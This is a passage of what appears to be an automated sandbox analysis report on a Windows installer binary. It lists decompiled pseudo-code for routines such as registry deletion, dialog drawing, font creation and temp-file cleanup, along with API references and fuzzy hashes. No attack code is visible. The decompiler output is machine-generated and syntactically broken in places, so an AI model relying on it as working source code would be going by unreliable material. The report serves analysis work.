                                                                                                                                                                                                          • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402D90
                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D9B
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CloseEnum$DeleteValue
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1354259210-0
                                                                                                                                                                                                          • Opcode ID: 681fed8778fb2982ecb5527b851c998c3744aa6ef2e2e43ab789fcfdd1fcd395
                                                                                                                                                                                                          • Instruction ID: d75478e88f471254037528958efdeb905634950da4f4823c7bb408bf4a1a64a1
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 681fed8778fb2982ecb5527b851c998c3744aa6ef2e2e43ab789fcfdd1fcd395
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 44215771900108BBEF129F90CE89EEE7A7DEF44344F100476FA55B11A0E7B48E54AA68
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 77%
                                                                                                                                                                                                          			E00401D65(void* __ebx, void* __edx) {
                                                                                                                                                                                                          				struct HWND__* _t30;
                                                                                                                                                                                                          				CHAR* _t38;
                                                                                                                                                                                                          				void* _t48;
                                                                                                                                                                                                          				void* _t53;
                                                                                                                                                                                                          				signed int _t55;
                                                                                                                                                                                                          				signed int _t58;
                                                                                                                                                                                                          				long _t61;
                                                                                                                                                                                                          				void* _t65;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t53 = __ebx;
                                                                                                                                                                                                          				if(( *(_t65 - 0x1b) & 0x00000001) == 0) {
                                                                                                                                                                                                          					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x20));
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					E00402BAC(2);
                                                                                                                                                                                                          					 *((intOrPtr*)(__ebp - 0x38)) = __edx;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t55 =  *(_t65 - 0x1c);
                                                                                                                                                                                                          				 *(_t65 + 8) = _t30;
                                                                                                                                                                                                          				_t58 = _t55 & 0x00000004;
                                                                                                                                                                                                          				 *(_t65 - 0xc) = _t55 & 0x00000003;
                                                                                                                                                                                                          				 *(_t65 - 0x34) = _t55 >> 0x1f;
                                                                                                                                                                                                          				 *(_t65 - 0x30) = _t55 >> 0x0000001e & 0x00000001;
                                                                                                                                                                                                          				if((_t55 & 0x00010000) == 0) {
                                                                                                                                                                                                          					_t38 =  *(_t65 - 0x24) & 0x0000ffff;
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					_t38 = E00402BCE(0x11);
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				 *(_t65 - 8) = _t38;
                                                                                                                                                                                                          				GetClientRect( *(_t65 + 8), _t65 - 0x84);
                                                                                                                                                                                                          				asm("sbb edi, edi");
                                                                                                                                                                                                          				_t61 = LoadImageA( ~_t58 &  *0x42f440,  *(_t65 - 8),  *(_t65 - 0xc),  *(_t65 - 0x7c) *  *(_t65 - 0x34),  *(_t65 - 0x78) *  *(_t65 - 0x30),  *(_t65 - 0x1c) & 0x0000fef0);
                                                                                                                                                                                                          				_t48 = SendMessageA( *(_t65 + 8), 0x172,  *(_t65 - 0xc), _t61);
                                                                                                                                                                                                          				if(_t48 != _t53 &&  *(_t65 - 0xc) == _t53) {
                                                                                                                                                                                                          					DeleteObject(_t48);
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				if( *((intOrPtr*)(_t65 - 0x28)) >= _t53) {
                                                                                                                                                                                                          					_push(_t61);
                                                                                                                                                                                                          					E004061AB();
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t65 - 4));
                                                                                                                                                                                                          				return 0;
                                                                                                                                                                                                          			}












                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1849352358-0
                                                                                                                                                                                                          • Opcode ID: 9d39b7960c4b589ca11e41561aab3825f23cbdbd0ce465e9420b3b3e566fd9b2
                                                                                                                                                                                                          • Instruction ID: af2208a9c993d9ce4f8579721101e2d802b93c806783de9e53f89228710c5587
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9d39b7960c4b589ca11e41561aab3825f23cbdbd0ce465e9420b3b3e566fd9b2
                                                                                                                                                                                                          • Instruction Fuzzy Hash: EA212A72E00109AFCF15DFA4DD85AAEBBB5EB48304F24407EF901F62A1CB389951DB54
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 73%
                                                                                                                                                                                                          			E00401E35(intOrPtr __edx) {
                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                          				int _t9;
                                                                                                                                                                                                          				signed char _t15;
                                                                                                                                                                                                          				struct HFONT__* _t18;
                                                                                                                                                                                                          				intOrPtr _t30;
                                                                                                                                                                                                          				struct HDC__* _t31;
                                                                                                                                                                                                          				void* _t33;
                                                                                                                                                                                                          				void* _t35;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t30 = __edx;
                                                                                                                                                                                                          				_t31 = GetDC( *(_t35 - 8));
                                                                                                                                                                                                          				_t9 = E00402BAC(2);
                                                                                                                                                                                                          				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
                                                                                                                                                                                                          				0x40b850->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t31, 0x5a), 0x48));
                                                                                                                                                                                                          				ReleaseDC( *(_t35 - 8), _t31);
                                                                                                                                                                                                          				 *0x40b860 = E00402BAC(3);
                                                                                                                                                                                                          				_t15 =  *((intOrPtr*)(_t35 - 0x18));
                                                                                                                                                                                                          				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
                                                                                                                                                                                                          				 *0x40b867 = 1;
                                                                                                                                                                                                          				 *0x40b864 = _t15 & 0x00000001;
                                                                                                                                                                                                          				 *0x40b865 = _t15 & 0x00000002;
                                                                                                                                                                                                          				 *0x40b866 = _t15 & 0x00000004;
                                                                                                                                                                                                          				E004062E0(_t9, _t31, _t33, 0x40b86c,  *((intOrPtr*)(_t35 - 0x24)));
                                                                                                                                                                                                          				_t18 = CreateFontIndirectA(0x40b850);
                                                                                                                                                                                                          				_push(_t18);
                                                                                                                                                                                                          				_push(_t33);
                                                                                                                                                                                                          				E004061AB();
                                                                                                                                                                                                          				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t35 - 4));
                                                                                                                                                                                                          				return 0;
                                                                                                                                                                                                          			}












                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetDC.USER32(?), ref: 00401E38
                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E52
                                                                                                                                                                                                          • MulDiv.KERNEL32 ref: 00401E5A
                                                                                                                                                                                                          • ReleaseDC.USER32(?,00000000), ref: 00401E6B
                                                                                                                                                                                                          • CreateFontIndirectA.GDI32(0040B850), ref: 00401EBA
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3808545654-0
                                                                                                                                                                                                          • Opcode ID: d1cbb2668a8e0048c904ace968a64d6fe2784e3b1926127080350a50dd5622c8
                                                                                                                                                                                                          • Instruction ID: bda7ea4a963eadc9936f181c2ed760bd7850ebe674c1e58b805f7706cadb7525
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d1cbb2668a8e0048c904ace968a64d6fe2784e3b1926127080350a50dd5622c8
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A3016D72504248AEE7007BB1AE4AA9A3FF8E755301F10887AF141B61F2CB7804458B6C
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 77%
                                                                                                                                                                                                          			E00404B1A(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                                                                                                                                                                                                          				char _v36;
                                                                                                                                                                                                          				char _v68;
                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                          				signed int _t21;
                                                                                                                                                                                                          				signed int _t22;
                                                                                                                                                                                                          				void* _t29;
                                                                                                                                                                                                          				void* _t31;
                                                                                                                                                                                                          				void* _t32;
                                                                                                                                                                                                          				void* _t41;
                                                                                                                                                                                                          				signed int _t43;
                                                                                                                                                                                                          				signed int _t47;
                                                                                                                                                                                                          				signed int _t50;
                                                                                                                                                                                                          				signed int _t51;
                                                                                                                                                                                                          				signed int _t53;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t21 = _a16;
                                                                                                                                                                                                          				_t51 = _a12;
                                                                                                                                                                                                          				_t41 = 0xffffffdc;
                                                                                                                                                                                                          				if(_t21 == 0) {
                                                                                                                                                                                                          					_push(0x14);
                                                                                                                                                                                                          					_pop(0);
                                                                                                                                                                                                          					_t22 = _t51;
                                                                                                                                                                                                          					if(_t51 < 0x100000) {
                                                                                                                                                                                                          						_push(0xa);
                                                                                                                                                                                                          						_pop(0);
                                                                                                                                                                                                          						_t41 = 0xffffffdd;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					if(_t51 < 0x400) {
                                                                                                                                                                                                          						_t41 = 0xffffffde;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					if(_t51 < 0xffff3333) {
                                                                                                                                                                                                          						_t50 = 0x14;
                                                                                                                                                                                                          						asm("cdq");
                                                                                                                                                                                                          						_t22 = 1 / _t50 + _t51;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t23 = _t22 & 0x00ffffff;
                                                                                                                                                                                                          					_t53 = _t22 >> 0;
                                                                                                                                                                                                          					_t43 = 0xa;
                                                                                                                                                                                                          					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
                                                                                                                                                                                                          					_t47 = 0;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t29 = E004062E0(_t41, _t47, _t53,  &_v36, 0xffffffdf);
                                                                                                                                                                                                          				_t31 = E004062E0(_t41, _t47, _t53,  &_v68, _t41);
                                                                                                                                                                                                          				_t32 = E004062E0(_t41, _t47, 0x42a8b8, 0x42a8b8, _a8);
                                                                                                                                                                                                          				wsprintfA(_t32 + lstrlenA(0x42a8b8), "%u.%u%s%s", _t53, _t47, _t31, _t29);
                                                                                                                                                                                                          				return SetDlgItemTextA( *0x42ec18, _a4, 0x42a8b8);
                                                                                                                                                                                                          			}




















                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • lstrlenA.KERNEL32(0042A8B8,0042A8B8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A35,000000DF,00000000,00000400,?), ref: 00404BB8
                                                                                                                                                                                                          • wsprintfA.USER32 ref: 00404BC0
                                                                                                                                                                                                          • SetDlgItemTextA.USER32(?,0042A8B8), ref: 00404BD3
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                                          • String ID: %u.%u%s%s
                                                                                                                                                                                                          • API String ID: 3540041739-3551169577
                                                                                                                                                                                                          • Opcode ID: 08f9c178ad4fdce5ba5a134203cc09d67d66b4423bbb0e6013138279e3fed682
                                                                                                                                                                                                          • Instruction ID: 2e00c39cbbb7080f6c78f9bc89fda30cce30f66f6b884b1aab771d4f97bc656b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 08f9c178ad4fdce5ba5a134203cc09d67d66b4423bbb0e6013138279e3fed682
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9111B7736041282BDB00656D9C42FAE3298DB85374F25027BFA26F71D1EA79DC2242ED
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 59%
                                                                                                                                                                                                          			E00401C2E(intOrPtr __edx) {
                                                                                                                                                                                                          				int _t29;
                                                                                                                                                                                                          				long _t30;
                                                                                                                                                                                                          				signed int _t32;
                                                                                                                                                                                                          				CHAR* _t35;
                                                                                                                                                                                                          				long _t36;
                                                                                                                                                                                                          				int _t41;
                                                                                                                                                                                                          				signed int _t42;
                                                                                                                                                                                                          				int _t46;
                                                                                                                                                                                                          				int _t56;
                                                                                                                                                                                                          				intOrPtr _t57;
                                                                                                                                                                                                          				struct HWND__* _t61;
                                                                                                                                                                                                          				void* _t64;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t57 = __edx;
                                                                                                                                                                                                          				_t29 = E00402BAC(3);
                                                                                                                                                                                                          				 *((intOrPtr*)(_t64 - 0x38)) = _t57;
                                                                                                                                                                                                          				 *(_t64 - 8) = _t29;
                                                                                                                                                                                                          				_t30 = E00402BAC(4);
                                                                                                                                                                                                          				 *((intOrPtr*)(_t64 - 0x38)) = _t57;
                                                                                                                                                                                                          				 *(_t64 + 8) = _t30;
                                                                                                                                                                                                          				if(( *(_t64 - 0x14) & 0x00000001) != 0) {
                                                                                                                                                                                                          					 *((intOrPtr*)(__ebp - 8)) = E00402BCE(0x33);
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				__eflags =  *(_t64 - 0x14) & 0x00000002;
                                                                                                                                                                                                          				if(( *(_t64 - 0x14) & 0x00000002) != 0) {
                                                                                                                                                                                                          					 *(_t64 + 8) = E00402BCE(0x44);
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				__eflags =  *((intOrPtr*)(_t64 - 0x2c)) - 0x21;
                                                                                                                                                                                                          				_push(1);
                                                                                                                                                                                                          				if(__eflags != 0) {
                                                                                                                                                                                                          					_t59 = E00402BCE();
                                                                                                                                                                                                          					_t32 = E00402BCE();
                                                                                                                                                                                                          					asm("sbb ecx, ecx");
                                                                                                                                                                                                          					asm("sbb eax, eax");
                                                                                                                                                                                                          					_t35 =  ~( *_t31) & _t59;
                                                                                                                                                                                                          					__eflags = _t35;
                                                                                                                                                                                                          					_t36 = FindWindowExA( *(_t64 - 8),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
                                                                                                                                                                                                          					goto L10;
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					_t61 = E00402BAC();
                                                                                                                                                                                                          					 *((intOrPtr*)(_t64 - 0x38)) = _t57;
                                                                                                                                                                                                          					_t41 = E00402BAC(2);
                                                                                                                                                                                                          					 *((intOrPtr*)(_t64 - 0x38)) = _t57;
                                                                                                                                                                                                          					_t56 =  *(_t64 - 0x14) >> 2;
                                                                                                                                                                                                          					if(__eflags == 0) {
                                                                                                                                                                                                          						_t36 = SendMessageA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8));
                                                                                                                                                                                                          						L10:
                                                                                                                                                                                                          						 *(_t64 - 0xc) = _t36;
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						_t42 = SendMessageTimeoutA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8), _t46, _t56, _t64 - 0xc);
                                                                                                                                                                                                          						asm("sbb eax, eax");
                                                                                                                                                                                                          						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				__eflags =  *((intOrPtr*)(_t64 - 0x28)) - _t46;
                                                                                                                                                                                                          				if( *((intOrPtr*)(_t64 - 0x28)) >= _t46) {
                                                                                                                                                                                                          					_push( *(_t64 - 0xc));
                                                                                                                                                                                                          					E004061AB();
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t64 - 4));
                                                                                                                                                                                                          				return 0;
                                                                                                                                                                                                          			}















                                                                                                                                                                                                          0x00401ca9
                                                                                                                                                                                                          0x00401ca9
                                                                                                                                                                                                          0x00401c8e
                                                                                                                                                                                                          0x00401ced
                                                                                                                                                                                                          0x00401cf0
                                                                                                                                                                                                          0x00401cf6
                                                                                                                                                                                                          0x004029a5
                                                                                                                                                                                                          0x004029a5
                                                                                                                                                                                                          0x00402a5d
                                                                                                                                                                                                          0x00402a69

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C9E
                                                                                                                                                                                                          • SendMessageA.USER32 ref: 00401CB6
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessageSend$Timeout
                                                                                                                                                                                                          • String ID: !
                                                                                                                                                                                                          • API String ID: 1777923405-2657877971
                                                                                                                                                                                                          • Opcode ID: 7f513ab6a3ebb62765d7b61154200c887099e4f9fcc296ff57337de7f7cd59e8
                                                                                                                                                                                                          • Instruction ID: c2b49ebb6df65f965b847d27db55c839bb0ece9d55d01ae65463d35699866107
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7f513ab6a3ebb62765d7b61154200c887099e4f9fcc296ff57337de7f7cd59e8
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1B215E71A44208BEEB05AFB5D98AAAD7FB5EF44304F20447EF502B61D1D6B88541DB28
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E00405BE5(CHAR* _a4) {
                                                                                                                                                                                                          				CHAR* _t7;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t7 = _a4;
                                                                                                                                                                                                          				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
                                                                                                                                                                                                          					lstrcatA(_t7, 0x40a014);
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				return _t7;
                                                                                                                                                                                                          			}





                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403473,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 00405BEB
                                                                                                                                                                                                          • CharPrevA.USER32(?,00000000), ref: 00405BF4
                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,0040A014,?,00000007,00000009,0000000B), ref: 00405C05
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BE5
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CharPrevlstrcatlstrlen
                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                          • API String ID: 2659869361-4017390910
                                                                                                                                                                                                          • Opcode ID: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                                                                                                                                                                                                          • Instruction ID: 4aa12e920610aceb8e029670fdf9df43119f1a02786e7ce54b96f7a39d5643bc
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E3D0A762A09630BAD20136655C09DCB19088F12701B05006BF101B2191C73C4C5147FD
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E0040396E() {
                                                                                                                                                                                                          				void* _t1;
                                                                                                                                                                                                          				void* _t2;
                                                                                                                                                                                                          				signed int _t11;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t1 =  *0x40a018; // 0x184
                                                                                                                                                                                                          				if(_t1 != 0xffffffff) {
                                                                                                                                                                                                          					CloseHandle(_t1);
                                                                                                                                                                                                          					 *0x40a018 =  *0x40a018 | 0xffffffff;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t2 =  *0x40a01c; // 0x188
                                                                                                                                                                                                          				if(_t2 != 0xffffffff) {
                                                                                                                                                                                                          					CloseHandle(_t2);
                                                                                                                                                                                                          					 *0x40a01c =  *0x40a01c | 0xffffffff;
                                                                                                                                                                                                          					_t11 =  *0x40a01c;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				E004039CB();
                                                                                                                                                                                                          				return E00405A15(_t11, "C:\\Users\\Albus\\AppData\\Local\\Temp\\nsqE488.tmp", 7);
                                                                                                                                                                                                          			}







                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000184), ref: 00403980
                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000188), ref: 00403994
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00403973
                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\nsqE488.tmp, xrefs: 004039A4
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CloseHandle
                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsqE488.tmp
                                                                                                                                                                                                          • API String ID: 2962429428-2531198557
                                                                                                                                                                                                          • Opcode ID: 9c3bbf5256d3b09d74f88582b30b225da325b648228e2b1124762f0c8a79aaf4
                                                                                                                                                                                                          • Instruction ID: e02401a4112a94a9765f7fc85388a0ec9ec9dd0d4867be743f4f38008bc29606
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9c3bbf5256d3b09d74f88582b30b225da325b648228e2b1124762f0c8a79aaf4
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 36E08C71910714A6C124AF7CAE8E8853B285B893357208726F078F20F0C7789AA74EAD
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 89%
                                                                                                                                                                                                          			E004052E8(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                                                                                                                                                                          				int _t15;
                                                                                                                                                                                                          				long _t16;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t15 = _a8;
                                                                                                                                                                                                          				if(_t15 != 0x102) {
                                                                                                                                                                                                          					if(_t15 != 0x200) {
                                                                                                                                                                                                          						_t16 = _a16;
                                                                                                                                                                                                          						L7:
                                                                                                                                                                                                          						if(_t15 == 0x419 &&  *0x42a8a4 != _t16) {
                                                                                                                                                                                                          							_push(_t16);
                                                                                                                                                                                                          							_push(6);
                                                                                                                                                                                                          							 *0x42a8a4 = _t16;
                                                                                                                                                                                                          							E00404CA4();
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						L11:
                                                                                                                                                                                                          						return CallWindowProcA( *0x42a8ac, _a4, _t15, _a12, _t16);
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					if(IsWindowVisible(_a4) == 0) {
                                                                                                                                                                                                          						L10:
                                                                                                                                                                                                          						_t16 = _a16;
                                                                                                                                                                                                          						goto L11;
